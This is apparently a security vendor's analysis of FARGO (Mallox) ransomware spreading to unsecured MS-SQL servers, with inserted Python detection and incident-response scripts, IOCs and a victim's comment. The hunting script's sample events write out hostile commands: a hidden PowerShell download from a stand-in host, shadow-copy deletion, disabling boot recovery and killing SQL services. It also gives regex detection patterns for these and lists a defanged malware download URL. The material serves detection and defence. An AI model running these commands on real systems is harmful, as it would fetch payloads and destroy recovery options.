FARGO Ransomware (Mallox) Being Distributed to Unsecured MS-SQL Servers

The ASEC analysis team constantly monitors malware distributed to unsecured MS-SQL servers. The team has recently discovered FARGO ransomware being distributed to unsecured MS-SQL servers. Along with GlobeImposter, FARGO is one of the prominent ransomware families that target unsecured MS-SQL servers. In the past it was also called Mallox, because it used the file extension .mallox.


– [ASEC Blog] Cobalt Strike Being Distributed to Unsecured MS-SQL Servers
– [ASEC Blog] Cobalt Strike Being Distributed to Unsecured MS-SQL Servers (2)
– [ASEC Blog] Coin Miner Being Distributed to Unsecured MS-SQL Servers
– [ASEC Blog] AsyncRAT Malware Being Distributed to Unsecured MS-SQL Servers

Figure 1. Process tree

As the process tree in Figure 1 shows, the MS-SQL process launches cmd.exe and powershell.exe to download a file. That file is built on .NET (see Figure 2); it downloads additional malware from a particular address and loads it. The loaded malware generates a BAT file in the %temp% directory and executes it; the BAT file shuts down certain processes and services.

Figure 2. Download of additional files

Figure 3. Creation and execution of BAT file

Figure 4. Details of BAT file

The ransomware's own behavior begins after it is injected into AppLaunch.exe, a legitimate Windows program. It attempts to delete a registry key on a certain path (see Figure 5), executes a command that deactivates recovery, and terminates certain processes (see Figure 6). As the figures show, the terminated processes are SQL programs.

Figure 5. Registry deletion

Figure 6. Deactivation of recovery and closing of processes
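The chain described in the two passages above (the MS-SQL process spawning cmd.exe and powershell.exe, a BAT file run from %temp%, SQL processes and services being stopped, and recovery being deactivated) expressed as a small hunting rule set over process-creation telemetry. This is an added example, not ASEC's code and not taken from the samples: the event records are constructed Sysmon-style telemetry, the loader and BAT file names are made up, and the specific recovery-deactivation and SQL-shutdown commands (vssadmin, bcdedit, wbadmin, wmic, taskkill, net stop) are assumptions about what such BAT files and ransomware typically run, since the post shows the real commands only in its figures.

```python
"""Hunt for the FARGO delivery chain in process-creation telemetry.

Added example, not ASEC's code. SAMPLE_EVENTS is constructed Sysmon-style
telemetry (ParentImage / Image / CommandLine); the loader and BAT names
are made up. The recovery-deactivation and SQL-shutdown patterns are
assumptions about what such BAT files and ransomware usually run.
"""
import ntpath
import re
from typing import Dict, List

SQL_BINN = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn"
APPLAUNCH = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
TEMP = r"C:\Users\svc_sql\AppData\Local\Temp"  # constructed %temp% of the SQL service account

SAMPLE_EVENTS: List[Dict[str, str]] = [
    # stage 1: the MS-SQL service spawns a shell that fetches the .NET dropper
    {"ParentImage": SQL_BINN + r"\sqlservr.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -nop -w hidden -c (New-Object Net.WebClient)"
                    ".DownloadFile('http://example.invalid/a.png','" + TEMP + r"\loader.exe')"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadFile(...)"},
    # stage 2: the loaded malware writes a BAT file to %temp% and runs it
    {"ParentImage": TEMP + r"\loader.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c "' + TEMP + r'\stop.bat"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\taskkill.exe",
     "CommandLine": "taskkill /f /im sqlservr.exe"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net stop MSSQLSERVER /y"},
    # stage 3: the ransomware, injected into AppLaunch.exe, disables recovery
    {"ParentImage": APPLAUNCH, "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin delete shadows /all /quiet"},
    {"ParentImage": APPLAUNCH, "Image": r"C:\Windows\System32\bcdedit.exe",
     "CommandLine": "bcdedit /set {default} recoveryenabled no"},
    # benign control event, must not match anything
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Assumed typical recovery-deactivation commands (the post only says recovery is deactivated).
RECOVERY_DISABLE = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"bcdedit(\.exe)?\b.*\brecoveryenabled\s+no\b", re.I),
    re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
]
# Assumed ways a BAT file stops SQL processes/services: taskkill or net stop on a *sql* target.
SQL_SHUTDOWN = re.compile(r"(taskkill\b.*\bsql|net(\.exe)?\s+stop\s+\S*sql)", re.I)
# A .bat under any ...\Temp\ directory on the command line.
TEMP_BAT = re.compile(r'\\temp\\[^\\\s"]+\.bat\b', re.I)


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one finding per (event, rule) pair that matches."""
    findings: List[Dict[str, str]] = []
    for ev in events:
        parent, image, cmd = basename(ev["ParentImage"]), basename(ev["Image"]), ev["CommandLine"]
        hits = []
        if parent == "sqlservr.exe" and image in SHELLS:
            hits.append("mssql_spawns_shell")
        if image == "cmd.exe" and TEMP_BAT.search(cmd):
            hits.append("bat_run_from_temp")
        if SQL_SHUTDOWN.search(cmd):
            hits.append("sql_processes_stopped")
        if any(p.search(cmd) for p in RECOVERY_DISABLE):
            hits.append("recovery_disabled")
        for rule in hits:
            findings.append({"rule": rule, "parent": parent, "image": image, "cmdline": cmd})
    return findings


def chain_coverage(events: List[Dict[str, str]]) -> List[str]:
    """Distinct stages observed; all four on one host within minutes is a strong signal."""
    return sorted({f["rule"] for f in hunt(events)})


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['rule']:<22} {f['parent']} -> {f['image']}: {f['cmdline']}")
    print("stages seen:", chain_coverage(SAMPLE_EVENTS))
```

Any single rule fires on legitimate administration now and then (a DBA restarting MSSQLSERVER, a backup job clearing shadow copies); it is the combination, and in particular sqlservr.exe as the parent of a shell, that should page someone.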

When the ransomware encrypts files, files with the extensions shown in Table 1 are excluded from infection. A characteristic aspect is that it does not infect files carrying the extension associated with GlobeImposter, and the exclusion list includes not only its own extensions .FARGO, .FARGO2 and .FARGO3 but also .FARGO4, which is presumably a future version of the ransomware.

Table 1. Extensions excluded from infection

Table 2. Files excluded from infection

Table 3. Paths excluded from infection

Figure 7 shows a screen capture of the ransom note, with an infected file visible in the top right of the same screen. As shown in the figure, an encrypted file is renamed to OriginalFileName.FileExtension.Fargo3, and the ransom note is generated with the filename 'RECOVERY FILES.txt'.

Figure 7. Ransom note and infected file
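An added incident-response helper, not part of the original post, that applies the naming scheme and exclusion family described above: it walks a directory tree, identifies files carrying a FARGO-family extension (.FARGO, .FARGO2, .FARGO3, .FARGO4, matched case-insensitively, the same family the ransomware itself skips), recovers the original name and extension from the OriginalFileName.FileExtension.Fargo3 pattern, and collects the 'RECOVERY FILES.txt' notes. The sample tree is constructed in a temporary directory; the script only inventories and does not decrypt anything.

```python
"""Inventory a FARGO-encrypted directory tree during incident response.

Added example, not ASEC's code. It recovers original file names from the
OriginalFileName.FileExtension.Fargo3 naming scheme and counts ransom
notes; nothing is decrypted. The sample tree is constructed in a temp dir.
"""
import os
import re
import shutil
import tempfile
from collections import Counter
from typing import Dict, List

# .FARGO, .FARGO2, .FARGO3, .FARGO4 ... matched case-insensitively: the family
# the ransomware excludes from encryption, so these are already-hit files.
FARGO_SUFFIX = re.compile(r"^(?P<original>.+)(?P<variant>\.fargo\d*)$", re.I)
RANSOM_NOTE = "RECOVERY FILES.txt"


def inventory(root: str) -> Dict[str, object]:
    """Walk root and report encrypted files, ransom notes and per-extension counts."""
    encrypted: List[Dict[str, str]] = []
    notes: List[str] = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if name == RANSOM_NOTE:
                notes.append(full)
                continue
            m = FARGO_SUFFIX.match(name)
            if m is None:
                continue
            original = m.group("original")  # e.g. lesson1.docx from lesson1.docx.Fargo3
            encrypted.append({
                "path": full,
                "original_name": original,
                "original_ext": os.path.splitext(original)[1].lower(),
                "variant": m.group("variant").lower(),
            })
    return {
        "encrypted": encrypted,
        "notes": notes,
        "by_ext": Counter(e["original_ext"] for e in encrypted),
        "by_variant": Counter(e["variant"] for e in encrypted),
    }


def build_sample_tree() -> str:
    """Create a constructed victim tree in a temp dir; the caller removes it."""
    root = tempfile.mkdtemp(prefix="fargo_ir_")
    layout = {
        "docs/lesson1.docx.Fargo3": b"\x00" * 64,
        "docs/budget.xlsx.Fargo3": b"\x00" * 64,
        "docs/RECOVERY FILES.txt": b"constructed ransom note",
        "db/backup.bak.FARGO3": b"\x00" * 64,
        "db/RECOVERY FILES.txt": b"constructed ransom note",
        "old/readme.txt.FARGO": b"\x00" * 16,  # hit by an earlier variant, skipped by this one
        "clean/notes.txt": b"untouched",
        "clean/photo.jpg": b"untouched",
    }
    for rel, data in layout.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    try:
        inv = inventory(root)
        print(f"{len(inv['encrypted'])} encrypted files, {len(inv['notes'])} ransom notes")
        for ext, n in inv["by_ext"].most_common():
            print(f"  {ext or '(no extension)'}: {n}")
        print("variants:", dict(inv["by_variant"]))
    finally:
        shutil.rmtree(root)
```

Run it against a mounted image of the victim rather than the live host, and keep the original-name mapping: it tells you which backups to restore and which extensions (database .bak files, for instance) the attacker reached.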

Typical attacks targeting database servers (MS-SQL, MySQL) are brute-force and dictionary attacks against systems whose account credentials are poorly managed. Systems that have not had vulnerability patches applied may also be attacked through those vulnerabilities.

Administrators of MS-SQL servers should use passwords that are difficult to guess for their accounts and change them periodically, to protect the database server from brute-force and dictionary attacks, and should apply the latest patches to prevent vulnerability attacks.
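As an added example of spotting the initial-access method described above, not code from the post: a detector for brute-force and dictionary attacks that reads the SQL Server ERRORLOG, which by default records failed logins as 'Login failed for user ...' lines carrying the client address. The log lines are constructed, and the threshold (ten failures from one client within sixty seconds) is an assumption to tune for the environment.

```python
"""Flag brute-force / dictionary attacks against SQL Server from ERRORLOG.

Added example, not ASEC's code. SQL Server logs failed logins by default
as 'Login failed for user ...' lines with the client address; the lines
below are constructed, and the 10-failures-in-60-seconds threshold is an
assumption to tune per environment.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

FAILED_LOGIN = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'\..*?\[CLIENT: (?P<client>[^\]]+)\]"
)


def _failed(ts: str, user: str, client: str) -> str:
    return (f"{ts} Logon       Login failed for user '{user}'. "
            f"Reason: Password did not match that for the login provided. [CLIENT: {client}]")


def build_sample_errorlog() -> List[str]:
    """Constructed ERRORLOG excerpt: 12 failures in 22 s from one client, plus two stray typos."""
    lines: List[str] = []
    base = datetime(2022, 9, 14, 3, 12, 7)
    for i in range(12):
        ts = (base + timedelta(seconds=2 * i)).strftime("%Y-%m-%d %H:%M:%S.00")
        lines.append(f"{ts} Logon       Error: 18456, Severity: 14, State: 8.")
        lines.append(_failed(ts, "admin" if i % 3 == 0 else "sa", "203.0.113.50"))
    lines.append(_failed("2022-09-14 03:20:01.55", "jsmith", "198.51.100.7"))
    lines.append(_failed("2022-09-14 03:25:44.02", "jsmith", "198.51.100.7"))
    lines.append("2022-09-14 03:26:00.00 spid52      Starting up database 'tempdb'.")
    return lines


SAMPLE_ERRORLOG = build_sample_errorlog()


def parse_failures(lines: List[str]) -> List[Dict[str, object]]:
    """Extract (timestamp, user, client) from failed-login lines; other lines are ignored."""
    out: List[Dict[str, object]] = []
    for line in lines:
        m = FAILED_LOGIN.match(line)
        if m:
            out.append({"ts": datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S"),
                        "user": m.group("user"), "client": m.group("client").strip()})
    return out


def detect_bruteforce(lines: List[str], threshold: int = 10,
                      window: timedelta = timedelta(seconds=60)) -> List[Dict[str, object]]:
    """One alert per client whose densest sliding window holds >= threshold failures."""
    by_client: Dict[str, List[Dict[str, object]]] = defaultdict(list)
    for f in sorted(parse_failures(lines), key=lambda f: f["ts"]):
        by_client[f["client"]].append(f)
    alerts: List[Dict[str, object]] = []
    for client, fs in by_client.items():
        best, start = 0, 0
        for end in range(len(fs)):
            while fs[end]["ts"] - fs[start]["ts"] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts.append({"client": client, "failures": best,
                           "users": sorted({f["user"] for f in fs}),
                           "first": fs[0]["ts"], "last": fs[-1]["ts"]})
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_ERRORLOG):
        print(f"{a['client']}: {a['failures']} failures, users tried {a['users']}, "
              f"{a['first']} .. {a['last']}")
```

The distinct-users list separates a password-guessing run against 'sa' from a username spray; either way the response is the same: block the client, confirm that 'sa' is disabled or renamed, and make sure the instance is not reachable on TCP 1433 from the internet at all.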

AhnLab’s anti-malware software, V3, detects and blocks the malware using the following aliases:

[File Detection]
– Ransomware/Win.Ransom.C5153317(2022.06.02.01)
– Dropper/Win.DotNet.C5237010(2022.09.14.03)
– Downloader/Win.Agent.R519342(2022.09.15.03)
– Trojan/BAT.Disabler (2022.09.16.00)

[Behavior Detection]
– Malware/MDP.Download.M1197

[IOC]
MD5

– b4fde4fb829dd69940a0368f44fca285
– c54daefe372efa4ee4b205502141d360
– 4d54af1bbf7357964db5d5be67523a7c
– 41bcad545aaf08d4617c7241fe36267c

Download
– hxxp://49.235.255[.]219:8080/Pruloh_Matsifkq.png

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

mahmoud (comment):

I'm Mahmoud from Iran. I am a teacher who has not been able to get an antivirus for my computer due to economic sanctions.
Unfortunately, my computer has been attacked by ransomware, and the person in question has requested cryptocurrency.
We live in a country that is governed by a dictatorship, and we cannot provide any software; we are not connected to anywhere in the world, and we cannot fulfil this hacker's request.
All my computer files, containing my teaching files for children, are encrypted, and at the end of each file name is the word FARGO3.
I want you to help me find a way to get these files back.
I know that there may be software that can neutralize this encryption, but I cannot download this software in Iran.
If there is a way, please let me know, or I will email all these files to you as a zip file so you can recover them and return them to me.
With this favor, you can help a teacher and a large number of students.

Thanks and best regards
Mahmoud

my email: hs.commercial@gmail.com
